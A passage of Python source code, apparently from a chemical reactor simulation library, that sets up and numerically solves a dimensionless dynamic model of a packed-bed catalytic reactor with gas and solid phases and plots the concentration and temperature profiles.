dxdtMat[indexT][r+1][z] = const_Ts1*dTsdti[r]
# NOTE
# set time
# flat
dxdt = dxdtMat.flatten().tolist()
return dxdt
# NOTE
# dynamic heterogenous modeling
def runM7(self):
"""
M7 modeling case (dimensionless)
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (dynamic, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: finite difference
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
solverMesh = solverConfig['mesh']
solverMeshSet = True if solverMesh == "normal" else False
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# numerical method
numericalMethod = self.modelInput['operating-conditions']['numerical-method']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# diffusivity coefficient - gas phase [m^2/s]
GaDii0 = self.modelInput['feed']['diffusivity']
# gas viscosity [Pa.s]
GaVii0 = self.modelInput['feed']['viscosity']
# gas mixture viscosity [Pa.s]
GaViMix0 = self.modelInput['feed']['mixture-viscosity']
# thermal conductivity - gas phase [J/s.m.K]
GaThCoi0 = self.modelInput['feed']['thermal-conductivity']
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix0 = self.modelInput['feed']['mixture-thermal-conductivity']
# REVIEW
# domain length
DoLe = 1
# orthogonal collocation points in the r direction
# rNo = solverSetting['S2']['rNo']
if numericalMethod == "fdm":
# finite difference points in the r direction
rNo = solverSetting['T1']['rNo']['fdm']
elif numericalMethod == "oc":
# orthogonal collocation points in the r direction
rNo = solverSetting['T1']['rNo']['oc']
else:
raise
# mesh setting
zMesh = solverSetting['T1']['zMesh']
# number of nodes
zNoNo = zMesh['zNoNo']
# domain length section
DoLeSe = zMesh['DoLeSe']
# mesh refinement degree
MeReDe = zMesh['MeReDe']
# mesh installment
if solverMeshSet is False:
zMeshRes = FiDiMeshGenerator(zNoNo, DoLe, DoLeSe, MeReDe)
# finite difference points
dataXs = zMeshRes['data1']
# dz lengths
dzs = zMeshRes['data2']
# finite difference point number
zNo = zMeshRes['data3']
# R ratio
zR = zMeshRes['data4']
# dz
dz = zMeshRes['data5']
else:
# finite difference points in the z direction
zNo = solverSetting['T1']['zNo']
# length list [reactor length]
dataXs = np.linspace(0, DoLe, zNo)
# element size - dz [m]
dz = DoLe/(zNo-1)
# reset
dzs = []
zR = []
### calculation ###
# mole fraction in the gas phase
MoFri0 = np.array(rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# mixture molecular weight [kg/mol]
MiMoWe0 = rmtUtil.mixtureMolecularWeight(MoFri0, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe0 = calDensityIG(MiMoWe0, SpCo0*1000)
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList0 = calMeanHeatCapacityAtConstantPressure(compList, T)
# Cp mixture
GaCpMeanMix0 = calMixtureHeatCapacityAtConstantPressure(
MoFri0, GaCpMeanList0)
# thermal diffusivity in the gas phase [m^2/s]
GaThDi = calThermalDiffusivity(
GaThCoMix0, GaDe0, GaCpMeanMix0, MiMoWe0)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo + 1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo + 1
# number of var columns [i]
varNoColumns = zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
if i == 0:
IV2D[m][j][i] = SpCoi0[m]/np.max(SpCoi0)
else:
IV2D[m][j][i] = SpCoi0[m]/np.max(SpCoi0)
else:
# solid phase
# SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
IV2D[m][j][i] = 1e-6
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
if i == 0:
IV2D[noLayer - 1][j][i] = 0 # T
else:
IV2D[noLayer - 1][j][i] = 0 # T
else:
# solid phase
IV2D[noLayer - 1][j][i] = 0 # T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# REVIEW
# solver setting
# NOTE
### dimensionless analysis ###
# concentration [kmol/m^3]
Cif = np.copy(SpCoi0)
# total concentration
Cf = SpCo0
# temperature [K]
Tf = T
# superficial velocity [m/s]
vf = SuGaVe0
# length [m]
zf = ReLe
# diffusivity [m^2/s]
Dif = np.copy(GaDii0)
# heat capacity at constant pressure [J/mol.K] | [kJ/kmol.K]
Cpif = np.copy(GaCpMeanList0)
# mixture heat capacity [J/mol.K] | [kJ/kmol.K]
Cpf = GaCpMeanMix0
# radius
rf = PaDi/2
# gas phase
# mass convective term - (list) [kmol/m^3.s]
_Cif = Cif if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.repeat(
np.max(Cif), compNo)
GaMaCoTe0 = (vf/zf)*_Cif
# mass diffusive term - (list) [kmol/m^3.s]
GaMaDiTe0 = (1/zf**2)*(_Cif*Dif)
# heat convective term [kJ/m^3.s]
GaHeCoTe0 = (GaDe0*vf*Tf*(Cpf/MiMoWe0)/zf)*1e-3
# heat diffusive term [kJ/m^3.s]
GaHeDiTe0 = (Tf*GaThCoMix0/zf**2)*1e-3
# solid phase
# mass diffusive term - (list) [kmol/m^3.s]
SoMaDiTe0 = (Dif*_Cif)/rf**2
# heat diffusive term [kJ/m^3.s]
SoHeDiTe0 = (GaThCoMix0*Tf/rf**2)*1e-3
### dimensionless numbers ###
# Re Number
ReNu0 = calReNoEq1(GaDe0, SuGaVe0, PaDi, GaViMix0)
# Sc Number
ScNu0 = calScNoEq1(GaDe0, GaViMix0, GaDii0)
# Sh Number (choose method)
ShNu0 = calShNoEq1(ScNu0, ReNu0, CONST_EQ_Sh['Frossling'])
# Prandtl Number
PrNu0 = calPrNoEq1(GaCpMeanMix0, GaViMix0, GaThCoMix0, MiMoWe0)
# Nu number
NuNu0 = calNuNoEq1(PrNu0, ReNu0)
# Strouhal number
StNu = 1
# Peclet number - mass transfer
PeNuMa0 = (vf*zf)/Dif
# Peclet number - heat transfer
PeNuHe0 = (zf*GaDe0*(Cpf/MiMoWe0)*vf)/GaThCoMix0
### transfer coefficient ###
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu0, GaDii0, PaDi)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu0, GaThCoMix0, PaDi)
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaViMix0,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0,
"GaDii0": GaDii0,
"GaThCoi0": GaThCoi0,
"GaVii0": GaVii0,
"GaDe0": GaDe0,
"GaCpMeanMix0": GaCpMeanMix0,
"GaThCoMix0": GaThCoMix0
},
"meshSetting": {
"solverMesh": solverMesh,
"solverMeshSet": solverMeshSet,
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz,
"dzs": dzs,
"zR": zR,
"zNoNo": zNoNo
},
"solverSetting": {
"dFdz": solverSetting['T1']['dFdz'],
"d2Fdz2": solverSetting['T1']['d2Fdz2'],
"dTdz": solverSetting['T1']['dTdz'],
"d2Tdz2": solverSetting['T1']['d2Tdz2'],
},
"reactionRateExpr": reactionRateExpr
}
# dimensionless analysis parameters
DimensionlessAnalysisParams = {
"Cif": Cif,
"Tf": Tf,
"vf": vf,
"zf": zf,
"Dif": Dif,
"Cpif": Cpif,
"Cpf": Cpf,
"rf": rf,
"GaMaCoTe0": GaMaCoTe0,
"GaMaDiTe0": GaMaDiTe0,
"GaHeCoTe0": GaHeCoTe0,
"GaHeDiTe0": GaHeDiTe0,
"ReNu0": ReNu0,
"ScNu0": ScNu0,
"ShNu0": ShNu0,
"PrNu0": PrNu0,
"PeNuMa0": PeNuMa0,
"PeNuHe0": PeNuHe0,
"MaTrCo": MaTrCo,
"HeTrCo": HeTrCo,
"SoMaDiTe0": SoMaDiTe0,
"SoHeDiTe0": SoHeDiTe0
}
# time span
tNo = solverSetting['T1']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['T1']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# FIXME
n = solverSetting['T1']['ode-solver']['PreCorr3']['n']
# t0 = 0
# tn = 5
# t = np.linspace(t0, tn, n+1)
paramsSet = (reactionListSorted, reactionStochCoeff,
FunParam, DimensionlessAnalysisParams)
funSet = PackedBedReactorClass.modelEquationM7
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
print(f"time: {t} seconds")
# ode call
if solverIVP == "AM":
# sol = AdBash3(t[0], t[1], n, IV, funSet, paramsSet)
# PreCorr3
sol = PreCorr3(t[0], t[1], n, IV, funSet, paramsSet)
successStatus = True
# time interval
dataTime = t
# all results
# components, temperature layers
dataYs = sol
else:
# method [1]: LSODA, [2]: BDF, [3]: Radau
# options
solverOptions = {
"atol": 1e-7
}
sol = solve_ivp(funSet, t, IV, method=solverIVP,
t_eval=times, args=(paramsSet,))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise
# time interval
dataTime = sol.t
# all results
# components, temperature layers
dataYs = sol.y
# REVIEW
# post-processing result
# std format
dataYs_Reshaped = np.reshape(
dataYs[:, -1], (noLayer, varNoRows, varNoColumns))
# component concentration [kmol/m^3]
# Ci and Cs
# dataYs1 = dataYs[0:varNoCon, -1]
# 3d matrix
# dataYs1_Reshaped = np.reshape(
# dataYs1, (compNo, varNoRows, varNoColumns))
dataYs1_Reshaped = dataYs_Reshaped[:-1]
# gas phase
dataYs1GasPhase = dataYs1_Reshaped[:, 0, :]
# solid phase
dataYs1SolidPhase = dataYs1_Reshaped[:, 1:, :]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1GasPhase, axis=0)
dataYs1_MoFri = dataYs1GasPhase/dataYs1_Ctot
# temperature - 2d matrix
dataYs2_Reshaped = dataYs_Reshaped[indexTemp]
# gas phase
dataYs2GasPhase = dataYs2_Reshaped[0, :].reshape((1, zNo))
# solid phase
dataYs2SolidPhase = dataYs2_Reshaped[1:, :]
# combine
_dataYs = np.concatenate(
(dataYs1_MoFri, dataYs2GasPhase), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCon": dataYs1GasPhase,
"dataYTemp": dataYs2GasPhase,
"dataYs": _dataYs,
"dataYCons": dataYs1SolidPhase,
"dataYTemps": dataYs2SolidPhase,
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
# ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
# subplot result
xLabelSet = "Dimensionless Reactor Length"
yLabelSet = "Dimensionless Concentration"
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, xLabelSet, yLabelSet, plotTitle)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM7(t, y, paramsSet):
"""
M7 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
solverMesh: mesh installment
solverMeshSet:
true: normal
false: mesh refinement
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
dzs: differential length list [-]
zR: z ratio
zNoNo: number of nodes in the dense and normal sections
solverSetting:
reactionRateExpr: reaction rate expressions
DimensionlessAnalysisParams:
Cif: feed concentration [kmol/m^3]
Tf: feed temperature
vf: feed superficial velocity [m/s]
zf: domain length [m]
Dif: diffusivity coefficient of component [m^2/s]
Cpif: feed heat capacity at constat pressure [kJ/kmol.K] | [J/mol.K]
rf: particle radius [m]
GaMaCoTe0: feed mass convective term of gas phase [kmol/m^3.s]
GaMaDiTe0: feed mass diffusive term of gas phase [kmol/m^3.s]
GaHeCoTe0: feed heat convective term of gas phase [kJ/m^3.s]
GaHeDiTe0, feed heat diffusive term of gas phase [kJ/m^3.s]
SoMaDiTe0: feed mass diffusive term of solid phase [kmol/m^3.s]
SoHeDiTe0: feed heat diffusive term of solid phase [kJ/m^3.s]
ReNu0: Reynolds number
ScNu0: Schmidt number
ShNu0: Sherwood number
PrNu0: Prandtl number
PeNuMa0: mass Peclet number
PeNuHe0: heat Peclet number
MaTrCo: mass transfer coefficient - gas/solid [m/s]
HeTrCo: heat transfer coefficient - gas/solid [J/m^2.s.K]
"""
# params
reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams = paramsSet
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# inlet superficial velocity [m/s]
# SuGaVe0 = constBC1['SuGaVe0']
# inlet diffusivity coefficient [m^2]
GaDii0 = constBC1['GaDii0']
# inlet gas thermal conductivity [J/s.m.K]
GaThCoi0 = constBC1['GaThCoi0']
# gas viscosity
GaVii0 = constBC1['GaVii0']
# gas density [kg/m^3]
GaDe0 = constBC1['GaDe0']
# heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
GaCpMeanMix0 = constBC1['GaCpMeanMix0']
# gas thermal conductivity [J/s.m.K]
GaThCoMix0 = constBC1['GaThCoMix0']
# mesh setting
meshSetting = FunParam['meshSetting']
# mesh installment
solverMesh = meshSetting['solverMesh']
# mesh refinement
solverMeshSet = meshSetting['solverMeshSet']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# dzs [m]/[-]
dzs = meshSetting['dzs']
# R ratio
zR = meshSetting['zR']
# number of nodes in the dense and normal sections
zNoNo = meshSetting['zNoNo']
# dense
zNoNoDense = zNoNo[0]
# normal
zNoNoNormal = zNoNo[1]
# solver setting
solverSetting = FunParam['solverSetting']
# mass balance equation
DIFF1_C_SET = solverSetting['dFdz']
DIFF2_C_SET_BC1 = solverSetting['d2Fdz2']['BC1']
DIFF2_C_SET_BC2 = solverSetting['d2Fdz2']['BC2']
DIFF2_C_SET_G = solverSetting['d2Fdz2']['G']
# energy balance equation
DIFF1_T_SET = solverSetting['dTdz']
DIFF2_T_SET_BC1 = solverSetting['d2Tdz2']['BC1']
DIFF2_T_SET_BC2 = solverSetting['d2Tdz2']['BC2']
DIFF2_T_SET_G = solverSetting['d2Tdz2']['G']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# dimensionless analysis params
# feed concentration [kmol/m^3]
Cif = DimensionlessAnalysisParams['Cif']
# feed temperature
Tf = DimensionlessAnalysisParams['Tf']
# feed superficial velocity [m/s]
vf = DimensionlessAnalysisParams['vf']
# domain length [m]
zf = DimensionlessAnalysisParams['zf']
# particle radius [m]
rf = DimensionlessAnalysisParams['rf']
# diffusivity coefficient of component [m^2/s]
Dif = DimensionlessAnalysisParams['Dif']
# feed heat capacity at constat pressure
Cpif = DimensionlessAnalysisParams['Cpif']
# feed mass convective term of gas phase [kmol/m^3.s]
GaMaCoTe0 = DimensionlessAnalysisParams['GaMaCoTe0']
# feed mass diffusive term of gas phase [kmol/m^3.s]
GaMaDiTe0 = DimensionlessAnalysisParams['GaMaDiTe0']
# feed heat convective term of gas phase [kJ/m^3.s]
GaHeCoTe0 = DimensionlessAnalysisParams['GaHeCoTe0']
# feed heat diffusive term of gas phase [kJ/m^3.s]
GaHeDiTe0 = DimensionlessAnalysisParams['GaHeDiTe0']
# feed mass diffusive term of solid phase [kmol/m^3.s]
SoMaDiTe0 = DimensionlessAnalysisParams['SoMaDiTe0']
# feed heat diffusive term of solid phase [kJ/m^3.s]
SoHeDiTe0 = DimensionlessAnalysisParams['SoHeDiTe0']
# Reynolds number
ReNu = DimensionlessAnalysisParams['ReNu0']
# Schmidt number
ScNu = DimensionlessAnalysisParams['ScNu0']
# Sherwood number
ShNu = DimensionlessAnalysisParams['ShNu0']
# Prandtl number
PrNu = DimensionlessAnalysisParams['PrNu0']
# mass Peclet number
PeNuMa0 = DimensionlessAnalysisParams['PeNuMa0']
# heat Peclet number
PeNuHe0 = DimensionlessAnalysisParams['PeNuHe0']
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = DimensionlessAnalysisParams['MaTrCo']
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = DimensionlessAnalysisParams['HeTrCo']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# effective heat capacity at constant pressure
SoCpMeanMixEff = np.zeros(rNo)
# dimensionless analysis
SoCpMeanMixEff_ReVa = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [mol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# dimensionless analysis
CoSpi_ReVa = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# dimensionless analysis
CosSpi_r_ReVa = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer - 1]
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CoSpi_ReVa[i] = rmtUtil.calRealDiLessValue(
CoSpi[i], SpCoi0_Set)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# dimensionless analysis: real value
CoSp_ReVa = np.sum(CoSpi_ReVa)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
CosSpi_r[r][i] = max(_CosSpi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_r_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CosSpi_r_ReVa[r][i] = rmtUtil.calRealDiLessValue(
CosSpi_r[r][i], SpCoi0_r_Set)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# dimensionless analysis: real value
CosSp_r_ReVa = np.sum(CosSpi_r_ReVa, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# dimensionless analysis
CosSpi_cat_DiLeVa = CosSpi_r[0, :]
# temperature [K]
T = T_z[z]
T_ReVa = rmtUtil.calRealDiLessValue(T, T0, "TEMP")
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
Ts_r_ReVa0 = rmtUtil.calRealDiLessValue(Ts_r, Tf, "TEMP")
Ts_r_ReVa = np.reshape(Ts_r_ReVa0, -1)
# pressure [Pa]
P = P_z[z]
# FIXME
# velocity
# dimensionless value
# v = v_z[z]
v = 1
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi_ReVa))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r_ReVa)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
